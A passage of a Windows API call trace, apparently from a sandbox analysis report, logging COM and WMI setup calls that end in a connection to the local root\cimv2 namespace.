returned 0x642ffff29b0 [0083.897] CoTaskMemFree (pv=0x1b911790) [0083.898] CoTaskMemAlloc (cb=0x16) returned 0x1b911790 [0083.899] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndMethodEnumeration") returned 0x642ffff2a00 [0083.899] CoTaskMemFree (pv=0x1b911790) [0083.899] CoTaskMemAlloc (cb=0x17) returned 0x1b911790 [0083.899] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodQualifierSet") returned 0x642ffff2a10 [0083.899] CoTaskMemFree (pv=0x1b911790) [0083.900] CoTaskMemAlloc (cb=0x11) returned 0x1b911750 [0083.901] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodOrigin") returned 0x642ffff2a30 [0083.901] CoTaskMemFree (pv=0x1b911750) [0083.902] CoTaskMemAlloc (cb=0x12) returned 0x1b911750 [0083.903] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Get") returned 0x642ffff2a60 [0083.903] CoTaskMemFree (pv=0x1b911750) [0083.904] CoTaskMemAlloc (cb=0x12) returned 0x1b911750 [0083.905] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Put") returned 0x642ffff2ab0 [0083.905] CoTaskMemFree (pv=0x1b911750) [0083.906] CoTaskMemAlloc (cb=0x15) returned 0x1b911750 [0083.907] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Delete") returned 0x642ffff2ae0 [0083.907] CoTaskMemFree (pv=0x1b911750) [0083.908] CoTaskMemAlloc (cb=0x17) returned 0x1b911750 [0083.908] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_GetNames") returned 0x642ffff2af0 [0083.908] CoTaskMemFree (pv=0x1b911750) [0083.909] CoTaskMemAlloc (cb=0x1f) returned 0x1b920a00 [0083.910] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x642ffff2b10 [0083.910] CoTaskMemFree (pv=0x1b920a00) [0083.911] CoTaskMemAlloc (cb=0x13) returned 0x1b911750 [0083.911] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Next") returned 0x642ffff2b20 [0083.911] CoTaskMemFree (pv=0x1b911750) [0083.913] CoTaskMemAlloc (cb=0x1d) returned 0x1b920bb0 [0083.913] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_EndEnumeration") returned 0x642ffff2b70 [0083.913] CoTaskMemFree (pv=0x1b920bb0) [0083.913] CoTaskMemAlloc (cb=0x19) returned 0x1b920be0 [0083.914] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetCurrentApartmentType") returned 0x642ffff2a50 [0083.914] CoTaskMemFree (pv=0x1b920be0) [0083.914] CoTaskMemAlloc (cb=0x16) returned 0x1b911750 [0083.915] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetDemultiplexedStub") returned 0x642ffff2060 [0083.915] CoTaskMemFree (pv=0x1b911750) [0083.916] CoTaskMemAlloc (cb=0x17) returned 0x1b911750 [0083.916] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateInstanceEnumWmi") returned 0x642ffff1760 [0083.916] CoTaskMemFree (pv=0x1b911750) [0083.920] CoTaskMemAlloc (cb=0x14) returned 0x1b911750 [0083.920] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateClassEnumWmi") returned 0x642ffff18c0 [0083.920] CoTaskMemFree (pv=0x1b911750) [0083.923] CoTaskMemAlloc (cb=0xe) returned 0x1b911750 [0083.923] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecQueryWmi") returned 0x642ffff1a20 [0083.923] CoTaskMemFree (pv=0x1b911750) [0083.926] CoTaskMemAlloc (cb=0x1a) returned 0x1b920e20 [0083.927] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecNotificationQueryWmi") returned 0x642ffff1b90 [0083.927] CoTaskMemFree (pv=0x1b920e20) [0083.930] CoTaskMemAlloc (cb=0x10) returned 0x1b911750 [0083.930] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutInstanceWmi") returned 0x642ffff1d00 [0083.930] CoTaskMemFree (pv=0x1b911750) [0083.932] CoTaskMemAlloc (cb=0xd) returned 0x1b911750 [0083.932] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutClassWmi") returned 0x642ffff1e00 [0083.933] CoTaskMemFree (pv=0x1b911750) [0083.935] CoTaskMemAlloc (cb=0x1a) returned 0x1b920a60 [0083.935] GetProcAddress (hModule=0x642ffff0000, lpProcName="CloneEnumWbemClassObject") returned 0x642ffff1f00 [0083.935] CoTaskMemFree (pv=0x1b920a60) [0083.939] CoTaskMemAlloc (cb=0x12) returned 0x1b911750 [0083.939] GetProcAddress (hModule=0x642ffff0000, lpProcName="ConnectServerWmi") returned 0x642ffff34c0 [0083.939] CoTaskMemFree (pv=0x1b911750) [0083.942] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dd30 | out: pAptType=0x1c90dd30*=1) returned 0x0 [0083.943] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90de38 | out: ppvObject=0x1c90de38*=0x0) returned 0x80004002 [0083.944] IUnknown:Release (This=0x142498) returned 0x0 [0083.967] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x1c90d530 | out: lpiid=0x1c90d530) returned 0x0 [0083.967] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d3a0 | out: ppv=0x1c90d3a0*=0x1be31370) returned 0x0 [0084.934] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31370, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d0b0 | out: ppvObject=0x1c90d0b0*=0x0) returned 0x80004002 [0084.934] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be31370, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d098 | out: ppvObject=0x1c90d098*=0x1be31390) returned 0x0 [0084.935] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31390, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cfa0 | out: ppvObject=0x1c90cfa0*=0x1be31390) returned 0x0 [0084.937] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31390, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d020 | out: ppvObject=0x1c90d020*=0x0) returned 0x80004002 [0084.938] WbemDefPath:IUnknown:AddRef (This=0x1be31390) returned 0x3 [0084.939] CoGetContextToken (in: pToken=0x1c90cc70 | out: pToken=0x1c90cc70) returned 0x0 [0084.940] CoGetObjectContext (in: riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1b90b808 | out: ppv=0x1b90b808*=0x142480) returned 0x0 [0084.940] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31390, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cc30 | out: ppvObject=0x1c90cc30*=0x1b9117b0) returned 0x0 [0084.940] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9117b0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc60 | out: pCid=0x1c90cc60*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0084.940] WbemDefPath:IUnknown:Release (This=0x1b9117b0) returned 0x3 [0084.943] CoGetContextToken (in: pToken=0x1c90cc40 | out: pToken=0x1c90cc40) returned 0x0 [0084.943] WbemDefPath:IUnknown:AddRef (This=0x1be31390) returned 0x4 [0084.943] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31390, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd58 | out: ppvObject=0x1c90cd58*=0x0) returned 0x80004002 [0084.943] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x3 [0084.943] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x2 [0084.943] WbemDefPath:IUnknown:Release (This=0x1be31370) returned 0x0 [0084.944] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x1 [0084.945] CoGetContextToken (in: pToken=0x1c90d970 | out: pToken=0x1c90d970) returned 0x0 [0084.945] CoGetContextToken (in: pToken=0x1c90d8b0 | out: pToken=0x1c90d8b0) returned 0x0 [0084.945] WbemDefPath:IUnknown:AddRef (This=0x1be31390) returned 0x2 [0084.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31390, riid=0x1c90d9f0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d9d0 | out: ppvObject=0x1c90d9d0*=0x1be31390) returned 0x0 [0084.946] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x2 [0084.946] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x1 [0084.947] CoGetObjectContext (in: riid=0x1c90cc98*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90cc90 | out: ppv=0x1c90cc90*=0x142498) returned 0x0 [0084.947] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90ccb0 | out: pAptType=0x1c90ccb0*=1) returned 0x0 [0084.947] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90cdb8 | out: ppvObject=0x1c90cdb8*=0x0) returned 0x80004002 [0084.947] IUnknown:Release (This=0x142498) returned 0x1 [0084.948] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c320 | out: ppv=0x1c90c320*=0x1be31370) returned 0x0 [0084.949] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31370, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c030 | out: ppvObject=0x1c90c030*=0x0) returned 0x80004002 [0084.949] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be31370, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c018 | out: ppvObject=0x1c90c018*=0x1be31490) returned 0x0 [0084.949] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31490, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bf20 | out: ppvObject=0x1c90bf20*=0x1be31490) returned 0x0 [0084.949] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31490, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90bfa0 | out: ppvObject=0x1c90bfa0*=0x0) returned 0x80004002 [0084.950] WbemDefPath:IUnknown:AddRef (This=0x1be31490) returned 0x3 [0084.950] CoGetContextToken (in: pToken=0x1c90bbf0 | out: pToken=0x1c90bbf0) returned 0x0 [0084.950] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31490, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bbb0 | out: ppvObject=0x1c90bbb0*=0x1b9117f0) returned 0x0 [0084.950] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9117f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90bbe0 | out: pCid=0x1c90bbe0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0084.950] WbemDefPath:IUnknown:Release (This=0x1b9117f0) returned 0x3 [0084.950] CoGetContextToken (in: pToken=0x1c90bbc0 | out: pToken=0x1c90bbc0) returned 0x0 [0084.950] WbemDefPath:IUnknown:AddRef (This=0x1be31490) returned 0x4 [0084.950] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31490, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bcd8 | out: ppvObject=0x1c90bcd8*=0x0) returned 0x80004002 [0084.950] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x3 [0084.951] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x2 [0084.951] WbemDefPath:IUnknown:Release (This=0x1be31370) returned 0x0 [0084.951] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x1 [0084.951] CoGetContextToken (in: pToken=0x1c90c8f0 | out: pToken=0x1c90c8f0) returned 0x0 [0084.951] CoGetContextToken (in: pToken=0x1c90c830 | out: pToken=0x1c90c830) returned 0x0 [0084.951] WbemDefPath:IUnknown:AddRef (This=0x1be31490) returned 0x2 [0084.951] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31490, riid=0x1c90c970*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90c950 | out: ppvObject=0x1c90c950*=0x1be31490) returned 0x0 [0084.951] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x2 [0084.952] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x1 [0084.957] CoGetContextToken (in: pToken=0x1c90ca70 | out: pToken=0x1c90ca70) returned 0x0 [0084.957] CoGetContextToken (in: pToken=0x1c90c9b0 | out: pToken=0x1c90c9b0) returned 0x0 [0084.957] WbemDefPath:IUnknown:AddRef (This=0x1be31490) returned 0x2 [0084.957] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31490, riid=0x1c90caf0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cad0 | out: ppvObject=0x1c90cad0*=0x1be31490) returned 0x0 [0084.957] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x2 [0084.957] WbemDefPath:IUnknown:AddRef (This=0x1be31490) returned 0x3 [0084.958] WbemDefPath:IWbemPath:SetText (This=0x1be31490, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0084.958] WbemDefPath:IUnknown:Release (This=0x1be31490) returned 0x2 [0084.958] CoGetContextToken (in: pToken=0x1c90daf0 | out: pToken=0x1c90daf0) returned 0x0 [0084.958] CoGetContextToken (in: pToken=0x1c90da30 | out: pToken=0x1c90da30) returned 0x0 [0084.958] WbemDefPath:IUnknown:AddRef (This=0x1be31390) returned 0x2 [0084.959] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be31390, riid=0x1c90db70*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db50 | out: ppvObject=0x1c90db50*=0x1be31390) returned 0x0 [0084.959] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x2 [0084.959] WbemDefPath:IUnknown:AddRef (This=0x1be31390) returned 0x3 [0084.959] WbemDefPath:IWbemPath:SetText (This=0x1be31390, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0 [0084.959] WbemDefPath:IUnknown:Release (This=0x1be31390) returned 0x2 [0084.961] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90de00 | out: puCount=0x1c90de00*=0x2) returned 0x0 [0084.962] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90de00*=0x0, pszText=0x0 | out: puBuffLength=0x1c90de00*=0x17, pszText=0x0) returned 0x0 [0084.962] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90de00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90de00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0084.968] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90ddb0 | out: puCount=0x1c90ddb0*=0x2) returned 0x0 [0084.968] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90ddb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90ddb0*=0x17, pszText=0x0) returned 0x0 [0084.968] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90ddb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90ddb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0084.973] CoGetObjectContext (in: riid=0x1c90dce8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dce0 | out: ppv=0x1c90dce0*=0x142498) returned 0x0 [0084.974] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dd00 | out: pAptType=0x1c90dd00*=1) returned 0x0 [0084.974] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90de08 | out: ppvObject=0x1c90de08*=0x0) returned 0x80004002 [0084.974] IUnknown:Release (This=0x142498) returned 0x1 [0084.974] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x1c90db20 | out: lpiid=0x1c90db20) returned 0x0 [0084.974] CoGetClassObject (in: rclsid=0x1b91ec38*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d990 | out: ppv=0x1c90d990*=0x1be317d0) returned 0x0 [0085.223] WbemLocator:IUnknown:QueryInterface (in: This=0x1be317d0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d6a0 | out: ppvObject=0x1c90d6a0*=0x0) returned 0x80004002 [0085.223] WbemLocator:IClassFactory:CreateInstance (in: This=0x1be317d0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d688 | out: ppvObject=0x1c90d688*=0x1be416b0) returned 0x0 [0085.223] WbemLocator:IUnknown:QueryInterface (in: This=0x1be416b0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d590 | out: ppvObject=0x1c90d590*=0x1be416b0) returned 0x0 [0085.224] WbemLocator:IUnknown:QueryInterface (in: This=0x1be416b0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d610 | out: ppvObject=0x1c90d610*=0x0) returned 0x80004002 [0085.224] WbemLocator:IUnknown:AddRef (This=0x1be416b0) returned 0x3 [0085.224] CoGetContextToken (in: pToken=0x1c90d260 | out: pToken=0x1c90d260) returned 0x0 [0085.224] WbemLocator:IUnknown:QueryInterface (in: This=0x1be416b0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d220 | out: ppvObject=0x1c90d220*=0x0) returned 0x80004002 [0085.225] CoGetContextToken (in: pToken=0x1c90d230 | out: pToken=0x1c90d230) returned 0x0 [0085.225] WbemLocator:IUnknown:AddRef (This=0x1be416b0) returned 0x4 [0085.225] WbemLocator:IUnknown:QueryInterface (in: This=0x1be416b0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d348 | out: ppvObject=0x1c90d348*=0x0) returned 0x80004002 [0085.225] WbemLocator:IUnknown:Release (This=0x1be416b0) returned 0x3 [0085.225] WbemLocator:IUnknown:Release (This=0x1be416b0) returned 0x2 [0085.225] WbemLocator:IUnknown:Release (This=0x1be317d0) returned 0x0 [0085.225] WbemLocator:IUnknown:Release (This=0x1be416b0) returned 0x1 [0085.227] CoGetContextToken (in: pToken=0x1c90d850 | out: pToken=0x1c90d850) returned 0x0 [0085.227] CoGetContextToken (in: pToken=0x1c90d790 | out: pToken=0x1c90d790) returned 0x0 [0085.227] WbemLocator:IUnknown:AddRef (This=0x1be416b0) returned 0x2 [0085.227] WbemLocator:IUnknown:QueryInterface (in: This=0x1be416b0, riid=0x1c90d8d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d8b0 | out: ppvObject=0x1c90d8b0*=0x1be416b0) returned 0x0 [0085.227] WbemLocator:IUnknown:Release (This=0x1be416b0) returned 0x2 [0085.227] WbemLocator:IUnknown:Release (This=0x1be416b0) returned 0x1 [0085.228] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dcb0 | out: puCount=0x1c90dcb0*=0x2) returned 0x0 [0085.228] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=8, puBuffLength=0x1c90dcb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dcb0*=0x17, pszText=0x0) returned 0x0 [0085.228] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=8, puBuffLength=0x1c90dcb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dcb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0085.236] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c90d9a0 | out: ppv=0x1c90d9a0*=0x1be41720) returned 0x0 [0085.237] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1be41720, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c90dc30 | out: ppNamespace=0x1c90dc30*=0x1be444f8) returned 0x0 [0104.913] WbemLocator:IUnknown:QueryInterface (in: This=0x1be444f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d818 | out: ppvObject=0x1c90d818*=0x1b92e6b0) returned 0x0 [0104.913] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b92e6b0, pProxy=0x1be444f8, pAuthnSvc=0x1c90d810, pAuthzSvc=0x1c90d80c, pServerPrincName=0x1c90d838, pAuthnLevel=0x1c90d808, pImpLevel=0x1c90d824, pAuthInfo=0x1c90d848, pCapabilites=0x1c90d820 | out: pAuthnSvc=0x1c90d810*=0xa, pAuthzSvc=0x1c90d80c*=0x0, pServerPrincName=0x1c90d838, pAuthnLevel=0x1c90d808*=0x6, pImpLevel=0x1c90d824*=0x2, pAuthInfo=0x1c90d848, pCapabilites=0x1c90d820*=0x1) returned 0x0 [0104.913] WbemLocator:IUnknown:Release (This=0x1b92e6b0) returned 0x1 [0104.913] WbemLocator:IUnknown:QueryInterface (in: This=0x1be444f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d7b8 | out: ppvObject=0x1c90d7b8*=0x1b92e6f0) returned 0x0 [0104.913] WbemLocator:IUnknown:QueryInterface (in: This=0x1be444f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 